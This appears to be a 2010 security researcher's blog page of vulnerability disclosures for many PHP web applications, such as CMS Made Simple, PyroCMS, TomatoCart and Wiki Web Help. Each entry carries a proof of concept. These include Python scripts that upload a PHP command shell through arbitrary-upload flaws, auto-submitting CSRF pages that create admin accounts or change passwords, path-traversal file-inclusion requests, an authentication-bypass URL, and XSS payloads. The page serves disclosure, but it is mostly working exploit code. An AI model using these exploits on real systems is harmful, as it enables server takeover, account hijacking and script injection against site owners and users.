This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

CMS Made Simple 1.8 Download Manager 1.4.1 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Download Manager 1.4.1 Module can be exploited to upload a PHP shell.

PoC
import socket, re

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/modules/DownloadManager/lib/simple-upload/example.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 189\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="file"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/modules/DownloadManager/lib/simple-upload/'\
+ re.search(u'shell_[^.]+\.php', resp).group(0)

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path

upload_shell()

CMS Made Simple 1.8 Antz Toolkit 1.02 Module Arbitrary Upload

An arbitrary upload vulnerability in CMS Made Simple 1.8 Antz Toolkit 1.02 Module can be exploited to upload a PHP shell.

PoC
import socket

host = 'localhost'
path = '/cmsms'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/include.php HTTP/1.1\r\n'
'Host: localhost\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 257\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="antzSeed"\r\n'
'\r\n'
'\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="shell_file"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n'
'\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n'
'\r\n')

resp = s.recv(8192)

s.close()

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

print 'searching or shell'

for i in range(0, 9999):

shell_path = path + '/modules/antz/tmp/' + str(i) + 'shell.php'

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok in s.recv(8192)[:len(http_ok)]:
print '\r\nshell located at http://' + host + shell_path
break
else:
print '.',

upload_shell()

CMS Made Simple 1.8 Local File Inclusion

A local file inclusion vulnerability in CMS Made Simple 1.8 can be exploited to include arbitrary files.

PoC
import httplib, urllib

host = 'localhost'
path = '/cmsms'

lfi = '../' * 32 + 'windows/win.ini\x00'

c = httplib.HTTPConnection(host)
c.request('POST', path + '/admin/addbookmark.php',
urllib.urlencode({ 'default_cms_lang': lfi }),
{ 'Content-type': 'application/x-www-form-urlencoded' })
r = c.getresponse()

print r.status, r.reason
print r.read()

Orbis 1.0.2 Authentication Bypass

An authentication bypass vulnerability in Orbis 1.0.2 can be exploited to create a new admin.

Exploit
Several admin related scripts fail to terminate after setting the header location field.


PoC
http://localhost/orbis/admin/admin_users_create.php?nusern=new_admin&nuserp=Password1&nusert=2&nusere=@

PyroCMS 0.9.9.1 Cross-site Request Forgery

A cross-site request forgery vulnerability in PyroCMS 0.9.9.1 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/pyrocms/index.php/admin/users/create">
<input type="hidden" name="first_name" value="a" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="email" value="new_admin@x.com" />
<input type="hidden" name="username" value="new_admin" />
<input type="hidden" name="display_name" value="a" />
<input type="hidden" name="group" value="admin" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="password" value="Password1" />
<input type="hidden" name="confirm_password" value="Password1" />
<input type="hidden" name="btnAction" value="save" />
</form>
</body>
</html>

LifeType 1.2.10 Cross-site Request Forgery

A cross-site request forgery vulnerability in LifeType 1.2.10 can be exploited to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/lifetype-1.2.10/admin.php?userName=newadmin&userFullName=&newUserPassword=Password1&userEmail=a%40a.com&userStatus=1&blogId=1&blogName=asdfasdfs&userPermissions%5B49%5D=49&userPermissions%5B58%5D=58&userPermissions%5B52%5D=52&userPermissions%5B43%5D=43&userPermissions%5B46%5D=46&userPermissions%5B55%5D=55&userPermissions%5B39%5D=39&userPermissions%5B41%5D=41&userPermissions%5B1%5D=1&userPermissions%5B66%5D=66&userPermissions%5B65%5D=65&userPermissions%5B51%5D=51&userPermissions%5B60%5D=60&userPermissions%5B62%5D=62&userPermissions%5B54%5D=54&userPermissions%5B45%5D=45&userPermissions%5B64%5D=64&userPermissions%5B48%5D=48&userPermissions%5B57%5D=57&userPermissions%5B42%5D=42&userPermissions%5B50%5D=50&userPermissions%5B59%5D=59&userPermissions%5B61%5D=61&userPermissions%5B53%5D=53&userPermissions%5B44%5D=44&userPermissions%5B63%5D=63&userPermissions%5B47%5D=47&userPermissions%5B56%5D=56&userPermissions%5B40%5D=40&Add+User=Add&op=addUser" />
</body>
</html>

Globber 1.4 Cross-site Request Forgery

A cross-site request forgery vulnerability in Globber can be exploited
to add and delete blog posts.

PoC
<!-- Add (note that blog also must be "rebuilt") -->
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/globber/admin.php?task=edit&c=Misc&a=new-article">
<input type="hidden" name="title" value="New Article" />
<input type="hidden" name="date" value="06-07-2010 10:16 pm" />
<input type="hidden" name="tags" value="" />
<input type="hidden" name="content" value="&lt;script&gt;alert(0)&lt;/script&gt;" />
</form>
</body>
</html>

<!-- Delete -->
<html>
<body>
<img src="http://localhost/globber/admin.php?task=articles&delc=Misc&dela=first-post" />
</body>
</html>

InterPhoto 2.3.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in InterPhoto 2.3.0 can be exploited to change a user's password.

PoC
<html>
<body>
<img src="http://localhost/interphoto/mydesk.edit.php?action=updateuser&password=newpassword&repassword=newpassword&email=a%40a.com&userfullname=&usercompany=&useraddress=&userpostcode=&usertel=&userfax=&useronline=&userwebsite=" />
</body>
</html>

chillyCMS 1.1.3 Cross-site Request Forgery

A cross-site request forgery vulnerability in chillyCMS 1.1.3 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/chillyCMS/admin/usersgroups.site.php">
<input type="hidden" name="user" value="new_admin" />
<input type="hidden" name="name" value="a" />
<input type="hidden" name="pw" value="Password1" />
<input type="hidden" name="pw2" value="Password1" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="gids%5B%5D" value="1" />
<input type="hidden" name="gids%5B%5D" value="3" />
<input type="hidden" name="gids%5B%5D" value="4" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="language" value="en" />
<input type="hidden" name="getnewsletter" value="1" />
<input type="hidden" name="myaction" value="new" />
<input type="hidden" name="action" value="updateuser" />
<input type="hidden" name="id" value="" />
</form>
</body>
</html>

ImpressCMS 1.2.1 Final Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in ImpressCMS 1.2.1 Final can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/impresscms/plugins/csstidy/css_optimiser.php?url=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

RunCMS 2.1 Magpie RSS Module Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in RunCMS 2.1 Magpie RSS Module can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/runcms2.1/modules/headlines/magpierss/scripts/magpie_debug.php?url=%3Cscript%3Ealert(0)%3C/script%3E

PeteWiki 0.6 Reflected XSS

A reflected cross-site scripting vulnerability in PeteWiki 0.6 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/petewiki/index.php?show=%3Cscript%3Ealert(0)%3C/script%3E

Lion Wiki 3.2.3 Reflected Cross-site Scripting

A reflected cross-site scripting vulnerability in Lion Wiki 3.2.3 can be exploited to execute arbitrary JavaScript.

PoC
http://localhost/lionwiki/index.php?error=%3Cscript%3Ealert(0)%3C/script%3E&page=a

Monday, July 5, 2010

NetworX 1.03 Arbitrary Upload

An arbitrary upload vulnerability in NetworX 1.0.3 can be exploited to upload a PHP shell.

PoC
import sys, socket
host = 'localhost'
path = '/networx'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/upload.php?logout=shell.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'User-Agent: x\r\n'
'Content-Length: 193\r\n'
'Cache-Control: max-age=0\r\n'
'Origin: null\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="Filedata"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo "<pre>" + system($_GET["CMD"]) + "</pre>"; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp[:len(http_ok)]:
print 'error uploading shell'
return
else: print 'shell uploaded'

shell_path = path + '/tmp/shell.php'

s.send('GET ' + shell_path + ' HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192)[:len(http_ok)]: print 'shell not found'
else: print 'shell located at http://' + host + shell_path

upload_shell()

nuBuilder 10.04.20 Local File Inclusion

A local file inclusion vulnerability in nuBuilder 10.04.20 can be exploited to include arbitrary files.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/fileuploader.php?dir=../../../../../../../../windows/system.ini

Lanius CMS 0.5.2 r1668 Cross-site Request Forgery

A cross-site request forgery vulnerability in Lanius CMS 0.5.2 r1668 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/laniuscms/admin.php?com_option=user">
<input type="hidden" name="task" value="create" />
<input type="hidden" name="user_id" value="" />
<input type="hidden" name="user_name" value="a" />
<input type="hidden" name="user_user" value="new_admin" />
<input type="hidden" name="user_email" value="a@a.com" />
<input type="hidden" name="user_lang" value="" />
<input type="hidden" name="user_tz" value="" />
<input type="hidden" name="user_gid" value="5" />
<input type="hidden" name="user_password" value="Password1" />
<input type="hidden" name="user_password1" value="Password1" />
</form>
</body>
</html>

Log1 CMS 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in Log1 CMS 2.0 can be exploited to change the admin username and password.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/log1cms2.0/admin/main.php?action=step1">
<input type="hidden" name="title" value="log1 CMS" />
<input type="hidden" name="desc" value="log1cms official page" />
<input type="hidden" name="key" value="log1, log 1, CMS, content managment system" />
<input type="hidden" name="language" value="0" />
<input type="hidden" name="bgcolor" value="#ffffff" />
<input type="hidden" name="textcolor" value="#999999" />
<input type="hidden" name="specialcolor" value="#000000" />
<input type="hidden" name="login" value="admin" />
<input type="hidden" name="pass" value="Password1" />
<input type="hidden" name="isMd5" value="1" />
<input type="hidden" name="google_login" value="gerard.caplain" />
<input type="hidden" name="email" value="log_1[ at ]users.sourceforge.net" />
<input type="hidden" name="copyright" value="2010 by log1" />
</form>
</body>
</html>

ATutor 2.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in ATutor 2.0 can be exploited to create a new admin (new_admin/Password1).

PoC
<html>
<body onload="document.forms[0].submit.click()">
<form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
<input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
<input type="hidden" name="password_error" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="confirm_password" value="" />
<input type="hidden" name="real_name" value="" />
<input type="hidden" name="email" value="x@x.com" />
<input type="hidden" name="priv_admin" value="1" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
</html>

nuBuilder 10.04.20 Reflected XSS

An XSS vulnerability in nuBuilder 10.04.20 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/nubuilder-10.04.20/productionnu2/nuedit.php?f=%3Cscript%3Ealert(0)%3C/script%3E

News Office 2.0.18 Reflected XSS

An XSS vulnerability in News Office 2.0.18 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/newsoffice/news_show.php?n-user=a&n-cat='%3E%3Cscript%3Ealert(0)%3C/script%3E

Bit Weaver 2.7 Reflected XSS

An XSS vulnerability in Bit Weaver 2.7 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/bitweaver/themes/preview_image.php?fImg=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

odCMS 1.07 Reflected XSS

An XSS vulnerability in odCMS 1.07 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/odcms/codes/archive.php?design=%3Cscript%3Ealert(0)%3C/script%3E

NetworX 1.0.3 Reflected XSS

An XSS vulnerability in NetworX 1.0.3 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/networx/group_connections_list_popup.php?group_id=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Orbis 1.0.2 Reflected XSS

An XSS vulnerability in Orbis 1.0.2 can be exploited to
execute arbitrary JavaScript.

PoC
http://localhost/orbis/admin/editors/text/editor-body.php?s=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Thursday, July 1, 2010

TomatoCart 1.0 Cross-site Request Forgery

A cross-site request forgery vulnerability in TomatoCart 1.0 can be exploited to create a new admin.

PoC
<html>
<body>
<img src="http://localhost/tomatocart/admin/json.php?module=administrators&action=save_administrator&modules=categories%2Cfeature_products_manager%2Cmanufacturers%2Cproduct_variants%2Cproducts%2Cproducts_attributes%2Cproducts_expected%2Cquantity_discount_groups%2Creviews%2Csearch_terms%2Cspecials%2Cconfiguration%2Cwizard_installation%2Chomepage_meta_info%2Carticles%2Carticles_categories%2Cfaqs%2Cslide_images%2Crecorvered_cart%2Ccoupons%2Ccredits_memo%2Ccustomers%2Ccustomers_groups%2Cemail%2Cgift_certificates%2Cinvoices%2Corders%2Corders_returns%2Cpurchased_downloadables%2Ccountries%2Ccredit_cards%2Ccurrencies%2Cimage_groups%2Cinformation%2Clanguages%2Corders_status%2Ctax_classes%2Cunit_classes%2Cweight_classes%2Czone_groups%2Cmodules_geoip%2Cmodules_order_total%2Cmodules_payment%2Cmodules_shipping%2Cservices%2Creports_customers%2Creports_products%2Creports_web%2Clogo_upload%2Ctemplates%2Ctemplates_modules%2Ctemplates_modules_layout%2Cadministrators%2Cadministrators_log%2Cbackup%2Cbanner_manager%2Ccache%2Cdashboard%2Cemail_templates%2Cfile_manager%2Cgoogle_sitemap%2Cimages%2Cimport_export%2Cnewsletters%2Cserver_info%2Cwhos_online&access_globaladmin=on&user_name=new_admin&user_password=Password1&email_address=test%40test.com" />
</body>
</html>

Bit Weaver 2.7 Local File Inclusion

A local file inclusion vulnerability in Bit Weaver 2.7 can be exploited to include arbitrary files.

PoC
http://localhost/bitweaver/wiki/rankings.php?style=../../../../../../../../windows/system.ini

Wiki Web Help 0.2.7 Arbitrary Upload

An arbitrary upload vulnerability in Wiki Web Help 0.2.7 can be exploited to upload a PHP shell.


PoC
import sys, socket
host = 'localhost'
path = '/wwh'
port = 80

def upload_shell():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(8)

s.send('POST ' + path + '/handlers/uploadimage.php HTTP/1.1\r\n'
'Host: ' + host + '\r\n'
'Proxy-Connection: keep-alive\r\n'
'Content-Length: 194\r\n'
'Cache-Control: max-age=0\r\n'
'Content-Type: multipart/form-data; boundary=----x\r\n'
'Accept: text/html\r\n'
'Accept-Encoding: gzip,deflate,sdch\r\n'
'Accept-Language: en-US,en;q=0.8\r\n'
'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3\r\n\r\n'
'------x\r\n'
'Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n'
'Content-Type: application/octet-stream\r\n\r\n'
'<?php echo \'<pre>\' + system($_GET[\'CMD\']) + \'</pre>\'; ?>\r\n'
'------x--\r\n\r\n')

resp = s.recv(8192)

http_ok = 'HTTP/1.1 200 OK'

if http_ok not in resp:
print 'error uploading shell'
return
else: print 'shell uploaded'

s.send('GET ' + path + '/images/shell.php HTTP/1.1\r\n'\
'Host: ' + host + '\r\n\r\n')

if http_ok not in s.recv(8192): print 'shell not found'
else: print 'shell located at ' + path + '/images/shell.php'

upload_shell()

Wiki Web Help 0.2.7 Persistent/Reflected XSS

Several XSS vulnerabilities in Wiki Web Help 0.2.7 can be exploited to execute arbitrary JavaScript.

Exploit
Persistent: Event attributes are not removed from user submitted HTML elements.

Reflected: The rev query string field of revert.php does not HTML encode user submitted data.


PoC
Persistent: <div onmouseover="alert(0)" style="margin:-500px;width:9999px;height:9999px;position:absolute;"></div>

Reflected: http://localhost/wwh/revert.php?rev=%3Cscript%3Ealert(0)%3C/script%3E